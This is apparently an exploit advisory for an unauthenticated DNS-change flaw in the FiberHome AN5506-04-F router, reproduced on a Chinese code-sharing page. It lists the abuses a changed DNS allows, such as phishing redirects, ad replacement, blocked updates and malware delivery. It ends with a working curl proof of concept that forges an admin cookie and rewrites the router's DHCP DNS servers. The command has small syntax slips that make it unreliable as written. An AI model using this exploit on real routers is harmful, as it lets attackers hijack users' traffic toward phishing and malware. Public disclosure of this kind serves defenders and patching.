扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 |
#FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability # #Software Version RP2617 #Device Model AN5506-04-F #Vendor Homepage: www.fiberhome.com/ # # #Date: 01/02/2018 #Exploit Author: r0ots3c #http://wandoelmo.com.br #https://www.facebook.com/wsec.info # #Description: #Vulnerability exists in web interface #This router has vulnerabilities where you can get information or edit configurations in an unauthenticated way. #The biggest risk is the possibility of changing the dns of the device. # #Modifying systems' DNS settings allows cybercriminals to #perform malicious activities like: # #oSteering unknowing users to bad sites: # These sites can be phishing pages that # spoof well-known sites in order to # trick users into handing out sensitive # information. # #oReplacing ads on legitimate sites: # Visiting certain sites can serve users # with infected systems a different set # of ads from those whose systems are # not infected. # #oControlling and redirecting network traffic: # Users of infected systems may not be granted # access to download important OS and software # updates from vendors like Microsoft and from # their respective security vendors. # #oPushing additional malware: # Infected systems are more prone to other # malware infections (e.g., FAKEAV infection). # # Proof of Concept: VIA CURL: curl 'http://<TARGET>/goform/setDhcp'-H 'Cookie: loginName=admin' -H --data 'dhcpType=1&dhcprelay_ip=&dhcpStart=192.168.1.2&dhcpEnd=192.168.1.254&dhcpMask=255.255.255.0&dhcpPriDns=<MALICIOUS DNS1>dhcpSecDns=<MALICIOUS DNS2>&dhcpGateway=192.168.1.1&dhcptime=24&dhcptime_m=0&option_60enable_s=0&option_125enable_s=0&option125_text=' --compressed -k -i |
体验盒子
